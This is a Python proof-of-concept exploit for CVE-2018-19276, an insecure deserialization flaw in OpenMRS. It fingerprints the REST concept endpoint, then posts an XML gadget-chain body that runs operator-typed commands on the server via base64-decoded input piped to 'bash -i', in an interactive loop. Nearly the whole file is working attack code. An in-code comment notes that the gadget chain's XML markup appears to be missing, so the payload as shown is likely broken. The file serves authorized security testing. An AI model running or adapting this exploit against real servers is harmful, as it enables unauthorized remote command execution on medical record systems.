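"""CVE-2018-19276 - OpenMRS insecure object deserialization RCE (interactive PoC).

Sends a crafted XML body to the OpenMRS REST ``concept`` endpoint; the server-side
deserializer is expected to run ``/bin/bash -c`` with the operator's command.
Output is NOT reflected back -- success is inferred from the HTTP 500 response
mentioning ``java.util.HashMap``.

For use only against systems you are authorized to test.
"""
import base64
import re
import sys

import requests

# for java8
remote = "http://127.0.0.1:8888/"
ressource = "/openmrs/ws/rest/v1/concept"
# requests-style proxy mapping (e.g. {"http": "http://127.0.0.1:8080"}) to route
# traffic through an intercepting proxy; empty means direct.
proxy = {}

# Seconds to wait on the target before giving up, so the command loop cannot
# hang forever on a dead or filtered host.
TIMEOUT = 30

# The request body is the original payload split around the spliced-in command.
# The command is base64-encoded so no shell metacharacter reaches the transport;
# the gadget decodes it with ``base64 -d`` and pipes it into ``bash -i``.
# NOTE(review): this listing appears to have lost the XML element markup of the
# gadget chain (only text nodes such as "java.lang.ProcessBuilder" / "start"
# remain while Content-Type is text/xml) -- confirm the body against the
# upstream PoC before relying on it.  The strings are kept byte-for-byte.
_PAYLOAD_HEAD = "\r\n \r\n \r\n 0\r\n \r\n \r\n \r\n \r\n \r\n false\r\n 0\r\n \r\n \r\n \r\n \r\n \r\n /bin/bash\r\n -c\r\n \t\t\t{echo,"
_PAYLOAD_TAIL = "}|{base64,-d}|{bash,-i}\r\n \r\n false\r\n \r\n \r\n \r\n \r\n java.lang.ProcessBuilder\r\n start\r\n \r\n \r\n foo\r\n \r\n foo\r\n \r\n \r\n \r\n \r\n \r\n false\r\n 0\r\n 0\r\n false\r\n \r\n false\r\n \r\n \r\n \r\n 0\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n"


def target_url():
    """Return ``remote`` joined to ``ressource`` with exactly one slash.

    The original script built the pre-check URL as ``remote + ressource``
    (giving ``.../8888//openmrs/...``) but hard-coded a different,
    single-slash URL for the exploit request, so changing ``remote`` only
    affected the check.  Both requests now hit the same URL.
    """
    return remote.rstrip("/") + "/" + ressource.lstrip("/")


def encode_command(command):
    """Return *command* as standard (RFC 4648) base64 text.

    The original replaced ``/`` with ``+`` after encoding.  Both characters
    are distinct values of the base64 alphabet, so that substitution silently
    corrupted any command whose encoding contained ``/`` -- ``base64 -d`` on
    the target would then run garbage instead of the intended command.
    """
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def build_payload(command):
    """Return the full request body with *command* spliced into the gadget."""
    return _PAYLOAD_HEAD + encode_command(command) + _PAYLOAD_TAIL


def _post(url, content_type, data=None):
    """POST *data* to *url* with the PoC's fixed transport options.

    ``verify=False`` disables TLS certificate validation (the default target
    is plain HTTP anyway); ``allow_redirects=False`` keeps the 500 status
    observable instead of following a redirect.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    return requests.post(
        url,
        headers={"Content-Type": content_type},
        data=data,
        proxies=proxy,
        verify=False,
        allow_redirects=False,
        timeout=TIMEOUT,
    )


def check_resource():
    """Probe the endpoint; return True when it answers HTTP 500 to an empty XML POST.

    A 500 on an empty ``application/xml`` body is the fingerprint the PoC uses
    to decide the deserializing endpoint is present.
    """
    print("[+] Checking if ressource available =>", end=" ")
    try:
        r = _post(target_url(), "application/xml")
    except requests.RequestException as exc:
        print("KO, request failed:", exc)
        return False
    if r.status_code == 500:
        print("\033[92mOK\033[0m")
        return True
    print("KO, ressource doesn't exist")
    return False


def run_command(command):
    """Send *command* to the target; return True when the response looks like success.

    Success means HTTP 500 whose body mentions ``java.util.HashMap`` -- the
    command's own output is never returned.  The original printed nothing at
    all for a non-500 response, leaving the "Executing" line dangling.
    """
    print("[+] Executing command =>", end=" ")
    try:
        r = _post(target_url(), "text/xml", build_payload(command))
    except requests.RequestException as exc:
        print("KO, request failed:", exc)
        return False
    # Escaped dots: the original pattern 'java.util.HashMap' let '.' match any char.
    if r.status_code == 500 and re.search(r"java\.util\.HashMap", r.text):
        print("\033[92mOK\033[0m")
        return True
    print("KO (HTTP {})".format(r.status_code))
    return False


def main():
    """Run the pre-check, then read commands until ``exit``, Ctrl-C or EOF."""
    print("\nCVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE\n")
    if not check_resource():
        # Non-zero so a wrapper script can tell "endpoint absent" from a clean exit.
        sys.exit(1)
    while True:
        try:
            command = input("command (\033[92mnot reflected\033[0m)> ")
            if command == "exit":
                print("Exiting...")
                break
            run_command(command)
        except (KeyboardInterrupt, EOFError):
            # EOFError covers a closed stdin (piped input), which the original
            # let escape as a traceback.
            print("Exiting...")
            break


if __name__ == "__main__":
    main()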